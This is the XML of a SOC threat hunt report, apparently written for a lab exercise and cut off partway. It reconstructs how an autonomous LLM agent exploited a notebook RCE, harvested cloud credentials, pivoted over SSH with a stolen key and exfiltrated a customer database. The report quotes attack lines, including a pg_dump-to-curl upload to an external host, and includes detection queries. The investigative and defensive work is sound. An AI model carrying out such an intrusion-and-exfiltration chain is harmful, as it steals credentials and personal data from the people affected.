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31x7mq6vmvhi" w:id="0"/>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000001">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">THREAT HUNT REPORT</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="bpkdhpbb47tk" w:id="1"/>
    <w:bookmarkEnd w:id="1"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hunt 24: TideGlass: Autonomous LLM-Agent Post-Exploitation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ovx19xgxqsy" w:id="2"/>
    <w:bookmarkEnd w:id="2"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rules applied throughout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times are UTC on the attack clock (2026-08-14). Every claim traces to a named table, timestamp, and field. Confidence (High / Medium / Low) is stated on inferences only, never on facts. Gaps that could not be closed are written up as findings.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7qcg655kt8y" w:id="3"/>
    <w:bookmarkEnd w:id="3"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Front Matter and Document Control</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>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Report title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 24 TideGlass: Autonomous LLM-Agent Post-Exploitation on the Greenfield Estate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HUNT-24-TIDEGLASS (case PW-2026-0814)</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Jenna Frank, Security Operations Manager, PacificWatch SOC</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issued (UTC)</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2026-09-21</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Classification / handling</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TLP:AMBER</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Distribution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PacificWatch SOC, Greenfield IR, Log(N) Pacific Cyber Range</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history</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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(UTC)</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Change</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2026-09-21</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Jenna Frank</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issue</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2026-09-21</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Jenna Frank</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Added nightly-backup and user-agent findings; ran review fixes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2026-09-22</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Jenna Frank</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EventName discriminator correction; ATT&amp;CK mechanism remap; consistency pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="evp6x2azmxb1" w:id="4"/>
    <w:bookmarkEnd w:id="4"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Executive Summary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morning of the incident, a data-science notebook that Greenfield had left reachable from the internet answered a connection from an unfamiliar address. Within seconds an automated attacker was running its own code inside it. About thirty-six minutes in, the customer database, 2.8 million records, was dumped and its contents sent toward an external server; telemetry confirms the outbound connection but not how much data arrived. The agent session continued to run until the 52-minute mark. No person was at a keyboard for any of it after the very first instruction.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human typed these commands. An autonomous AI agent was given a single sentence of direction: find the most valuable customer data in the environment and get it out. From that, the agent broke in through a known flaw in the notebook software, stole the notebook's cloud credentials, spread its outbound activity across six throwaway addresses to avoid tripping limits, pulled a login key out of the cloud key vault, used it to reach an internal server, identified the largest database table, copied it, and shipped it out compressed. It made every decision itself, and its own built-in safety control let all of its actions through because no rule existed to stop them.</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difficult part was separating the attacker from a busy, legitimate estate. Dozens of ordinary processes, connections, key reads, and staff logins looked almost identical to the malicious ones. In each case a single detail told them apart, and those details are the backbone of both the findings and the new alerts recommended here.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business impact is a confirmed loss of the full customer dataset. The credentials the attacker used are still live, the entry point is still open, and this hunt is handed to incident response for containment and breach assessment.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="6o5zz3ra5eaf" w:id="5"/>
    <w:bookmarkEnd w:id="5"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Overview Metadata</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>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Hunt type</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Intel-driven and model-assisted</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Trigger</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Analytics alert: unauthenticated WebSocket upgrade on the internet-facing notebook host, followed seconds later by a new interpreter under the notebook service</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 hunted (UTC)</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11:05:00 to 11:57:00 (~52 minutes)</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Estate in scope</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Greenfield subnet 10.6.0.0/24: gf-tg-nb01 (notebook), gf-tg-bastion01 (bastion), gf-tg-pg01 (Postgres); plus the linked AWS account 402913776148</w:t>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Analyst(s)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Jenna Frank</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spent</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Single hunt session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="5ygkj2uxw3me" w:id="6"/>
    <w:bookmarkEnd w:id="6"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Hypothesis and ABLE Scope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Hypothesis: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autonomous LLM agent exploited the internet-facing marimo notebook via CVE-2026-39987 and executed a complete post-exploitation chain (cloud credential theft, lateral movement to internal hosts, and exfiltration of the production database), reproducing the Sysdig-documented Marimo agent pattern, inside the 11:05 to 11:57 window. This is falsifiable: if the interpreter had a legitimate parent, if no credential theft touched the metadata service, or if the database was never dumped to an external destination, the hypothesis fails.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ABLE:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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ctor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Unattributed autonomous LLM agent at the outset; identified during the hunt as session tg-4b81e0d7, actor tideglass-agent</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ehaviour</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Unauthenticated kernel RCE, then metadata-service credential theft, secrets access via a rotating egress pool, SSH lateral movement with a stolen key, and pg_dump exfiltration of the customer table</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ocation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gf-tg-nb01 (entry and staging), the AWS control plane (Secrets Manager, IMDS), gf-tg-bastion01 (pivot), gf-tg-pg01 (target)</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vidence</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Interpreter lineage under the marimo service; an IMDS connection from that interpreter; a GetSecretValue retrieval call; a deploy-account SSH login on the bastion sourced from the notebook host; a pg_dump piped to an external upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="afaorq9hruqv" w:id="7"/>
    <w:bookmarkEnd w:id="7"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Threat Intel Inputs</w:t>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 link</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it shaped the hunt</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Sysdig Threat Research: LLM agent post-exploitation after Marimo CVE-2026-39987 exploit</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Hacker News / Sysdig (Pisa 2026); https://thehackernews.com/2026/05/attackers-use-llm-agent-for-post.html</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Defined the expected chain: marimo RCE, IMDS credential harvest, secrets access, SSH pivot, DB exfil. Provided the egress-pool and adaptiveness behaviours to look for.</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Case brief and baseline network (Log(N) Pacific)</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Internal hunt kit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Established the normal-traffic rule and the three-host topology used to separate signal from noise.</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MITRE ATT&amp;CK and MITRE ATLAS matrices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attack.mitre.org, atlas.mitre.org (v2026.09)</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Framework mapping for observed techniques and the agent-specific credential-harvesting classification.</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Intel scoped where to look and what the chain should resemble. It cannot, on its own, confirm an actor or prove any step occurred in this estate. The Sysdig reporting in particular describes a throttle-and-rotate egress pool attributed to Cloudflare Workers; that mechanism is intel, and the telemetry only confirms the rotation itself, not the infrastructure behind it (see Blind Spots and Finding F4).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="o5p2s98vet0o" w:id="8"/>
    <w:bookmarkEnd w:id="8"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Scope, Data Sources and Blind Spots</w:t>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source</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Period available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Confidence in coverage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ApacheAccess_CL</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LinuxProcess_CL</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(see blind spots)</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 shared with Hunt 23 JADEPUFFER</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 (scoped by RunId/session_id)</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Syslog</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Microsoft Sentinel</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window</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Blind spots (required).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 rate-limit responses in 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query for any populated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attacker's access key returns zero rows.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ThrottlingException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intel describes is not present. The egress-pool rotation is observable; the throttle it was meant to defeat is not provable from telemetry. This caps confidence in the "throttled" characterisation to inference from timing.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Secret contents are not recoverable from the cloud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GetSecretValue,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VersionId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never the plaintext. The stolen key material cannot be recovered from AWSCloudTrail alone; it is only observable where reused on the bastion.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Egress-pool infrastructure is invisible.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Only the six source IP addresses are in telemetry. The pool provider (attributed to Cloudflare Workers in the OSINT) is not.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RequestParameters did not render the SecretId in the live pull.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specific secret targeted was confirmed from the agent's own reasoning log rather than from the CloudTrail request body, a second-source corroboration rather than a single-source read.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Shared workspace.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LLMAgentLogs_CL contains both TideGlass and JADEPUFFER agent activity. Every query against it is scoped by RunId tg-119-20260903 or session_id tg-4b81e0d7.</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Ingestion-date artifact.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lab data was ingested on 2026-09-04, so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TimeGenerated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workspace reads 2026-09-04 for these events. The attack hours (11:05 to 11:57) are authoritative and are used throughout this report on the 2026-08-14 clock; queries in the appendix filter on 2026-09-04 for that reason.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="qzl0way60p0v" w:id="9"/>
    <w:bookmarkEnd w:id="9"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Execution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real path, including the wrong turns that forced better pivots.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="av6o9oy4cwvp" w:id="10"/>
    <w:bookmarkEnd w:id="10"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 Anchor the interpreter, then find what triggered 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process started under the notebook service, and what web request preceded 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LinuxProcess_CL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 == "gf-tg-nb01"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TargetProcessName, TargetProcessId, TargetProcessCommandLine, ActingProcessName, ActingProcessId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EventStartTime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ApacheAccess_CL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11:04:55) .. datetime(2026-09-04 11:05:10))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"gf-tg-nb01"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HttpMethod, UriStem, HttpStatus, ClientIP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python3.12 (PID 5211) at 11:05:06, parented by the marimo service (PID 3310).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/ws/kernel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returning HTTP 101 from 198.51.100.23 at 11:05:00, six seconds earlier.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request and the process live in two tables (host field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Joining on time and host proves the WebSocket upgrade triggered the interpreter. Anchors F1 and F2.</w:t>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24934"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: ApacheAccess_CL. GET /ws/kernel returns HTTP 101 from 198.51.100.23 at 11:05:00." id="10" name="image10.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: ApacheAccess_CL. GET /ws/kernel returns HTTP 101 from 198.51.100.23 at 11:05:00." id="0" name="image10.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="152493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ApacheAccess_CL. GET /ws/kernel returns HTTP 101 from 198.51.100.23 at 11:05:00.</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88256"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: LinuxProcess_CL. python3.12 PID 5211 spawned under the marimo service at 11:05:06." id="12" name="image11.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: LinuxProcess_CL. python3.12 PID 5211 spawned under the marimo service at 11:05:06." id="0" name="image11.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="188825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LinuxProcess_CL. python3.12 PID 5211 spawned under the marimo service at 11:05:06.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="wipgr394smnt" w:id="11"/>
    <w:bookmarkEnd w:id="11"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 Confirm the CVE in-workspace, not just from intel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does the agent name the vulnerability itself?</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session_id == "tg-4b81e0d7"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model_response has "CVE" or model_response has "marimo"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model_response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11:05:02, the agent reasons that marimo is exposed on 2718 with no token and the kernel WebSocket accepts code without authentication (CVE-2026-39987).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CVE confirmed from telemetry, corroborated by Sysdig OSINT. Backs F1.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="nhrfjk2edwz9" w:id="12"/>
    <w:bookmarkEnd w:id="12"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3 Pivot the interpreter into the network for credential theft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PID 5211 reach the metadata service, and what identity came back?</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LinuxNetwork_CL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DstIpAddr == "169.254.169.254"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count() by ActingProcessName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session_id == "tg-4b81e0d7"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model_response has "role" or model_response has "credential" or model_response has "169.254"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model_response, tool_name, tool_result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bounded to the window, ten connections reach 169.254.169.254: nine from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refresh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credential-helper daemon and exactly one from the interpreter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python3.12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(PID 5211, 11:08:12). The agent confirms role credentials retrieved for user/svc-notebook at 11:08:19.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interpreter, not the helper daemon, is the theft. Anchors F3. Also isolated the noise baseline for the Real-or-Noise finding.</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220091"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: LinuxNetwork_CL. In-window, 10 connections to 169.254.169.254; only PID 5211 (python3.12, 11:08:12) is not the refresh daemon." id="11" name="image9.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: LinuxNetwork_CL. In-window, 10 connections to 169.254.169.254; only PID 5211 (python3.12, 11:08:12) is not the refresh daemon." id="0" name="image9.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="322009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LinuxNetwork_CL. In-window, 10 connections to 169.254.169.254; only PID 5211 (python3.12, 11:08:12) is not the refresh daemon.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="gn7o0fxsas94" w:id="13"/>
    <w:bookmarkEnd w:id="13"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7.4 One key, many faces: the egress pool and the throttle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source addresses did the stolen key use, and can the throttle be proved?</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EventSource == "secretsmanager.amazonaws.com"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calls=count(), ips=dcount(SourceIpAddress), pool=make_set(SourceIpAddress)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extend gap_sec = datetime_diff('second', TimeGenerated, prev(TimeGenerated))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EventName, SourceIpAddress, gap_sec</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six distinct source IPs; a 24-second gap at 11:22:41 (from .71) resuming at 11:23:05 (from .94).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rotation is proved from data. The throttle is inferred from the gap-and-resume shape because no error row exists (see 7.7 dead ends). Anchors F4.</w:t>
      </w:r>
    </w:p>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877062"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: AWSCloudTrail. The svc-notebook key across the pool; the 24-second gap at 11:22:41 (.71) resuming 11:23:05 (.94)." id="14" name="image14.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: AWSCloudTrail. The svc-notebook key across the pool; the 24-second gap at 11:22:41 (.71) resuming 11:23:05 (.94)." id="0" name="image14.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="287706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AWSCloudTrail. The svc-notebook key across the pool; the 24-second gap at 11:22:41 (.71) resuming 11:23:05 (.94).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="u55kbwqmt2ty" w:id="14"/>
    <w:bookmarkEnd w:id="14"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7.5 Recon versus theft, then trace the key to the login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secret call took something, and where did the key go?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EventName == "GetSecretValue"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ReadOnly, ResponseElements, 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"gf-tg-nb01" and Command has "id_ed25519"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ShellUser,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LinuxAuth_CL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DvcHostname == "gf-tg-bastion01" and TargetUsername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TargetUsername, EventResult, EventOriginalMessage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GetSecretValue (the retrieval call, distinct from List/DescribeSecret) at 11:31:16, tagged ReadOnly=false in this lab data;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chmod 600 /tmp/.c/id_ed25519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11:31:22 (user marimo);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Accepted publickey for deploy from 10.6.0.10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bastion at 11:34:27 with an ED25519 fingerprint.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EventName (GetSecretValue vs List/DescribeSecret) separates the retrieval from the six enumeration calls; the key is traceable across three tables in three minutes. Anchors F5 and F6. Note the lab tags the retrieval ReadOnly=false, which is inverted from real CloudTrail (see F5).</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15379"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: AWSCloudTrail. The single GetSecretValue retrieval at 11:31:16 from 203.0.113.142 (tagged ReadOnly=false in this lab, inverted from real CloudTrail)." id="13" name="image13.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: AWSCloudTrail. The single GetSecretValue retrieval at 11:31:16 from 203.0.113.142 (tagged ReadOnly=false in this lab, inverted from real CloudTrail)." id="0" name="image13.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="221537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AWSCloudTrail. The single GetSecretValue retrieval at 11:31:16 from 203.0.113.142 (tagged ReadOnly=false in this lab, inverted from real CloudTrail).</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779848"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: LLMAgentLogs_CL. The agent confirms it retrieved a passphrase-less deploy key for the bastion at 11:31:20." id="16" name="image16.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: LLMAgentLogs_CL. The agent confirms it retrieved a passphrase-less deploy key for the bastion at 11:31:20." id="0" name="image16.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="177984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LLMAgentLogs_CL. The agent confirms it retrieved a passphrase-less deploy key for the bastion at 11:31:20.</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66797"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: LinuxShellHistory_CL. chmod 600 /tmp/.c/id_ed25519, user marimo, 11:31:22." id="15" name="image15.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: LinuxShellHistory_CL. chmod 600 /tmp/.c/id_ed25519, user marimo, 11:31:22." id="0" name="image15.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="2266797"/>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LinuxShellHistory_CL. chmod 600 /tmp/.c/id_ed25519, user marimo, 11:31:22.</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62211"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: LinuxAuth_CL. Accepted publickey for deploy from 10.6.0.10 on the bastion at 11:34:27, with the ED25519 fingerprint." id="18" name="image18.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: LinuxAuth_CL. Accepted publickey for deploy from 10.6.0.10 on the bastion at 11:34:27, with the ED25519 fingerprint." id="0" name="image18.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="186221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LinuxAuth_CL. Accepted publickey for deploy from 10.6.0.10 on the bastion at 11:34:27, with the ED25519 fingerprint.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="jl3zz254dohw" w:id="15"/>
    <w:bookmarkEnd w:id="15"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7.6 Recon by size, dump, and prove it from the database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table did it choose, and can the access be proved from Postgres?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ShellUser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"gf-tg-pg01"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SyslogMessage has "connection authorized" and SyslogMessage has "database=customers"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SyslogMessage</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psql ... '\dt+' | sort -k7 -h | tail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11:37:40; agent identifies customers at 2,841,902 rows at 11:37:42;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 ... customers | gzip | curl -T - https://203.0.113.41:8443/u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11:40:49; Postgres logs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 authorized: user=app database=customers host=10.6.0.20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11:40:44.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intent from the shell, ground truth from the DB log. Anchors F7.</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143497"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: LinuxShellHistory_CL. The deploy account's psql table-size recon and the pg_dump-to-curl exfiltration." id="17" name="image17.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: LinuxShellHistory_CL. The deploy account's psql table-size recon and the pg_dump-to-curl exfiltration." id="0" name="image17.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="2143497"/>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LinuxShellHistory_CL. The deploy account's psql table-size recon and the pg_dump-to-curl exfiltration.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672083"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: LLMAgentLogs_CL. The agent identifies customers as the largest table at 2,841,902 rows, 11:37:42." id="21" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: LLMAgentLogs_CL. The agent identifies customers as the largest table at 2,841,902 rows, 11:37:42." id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
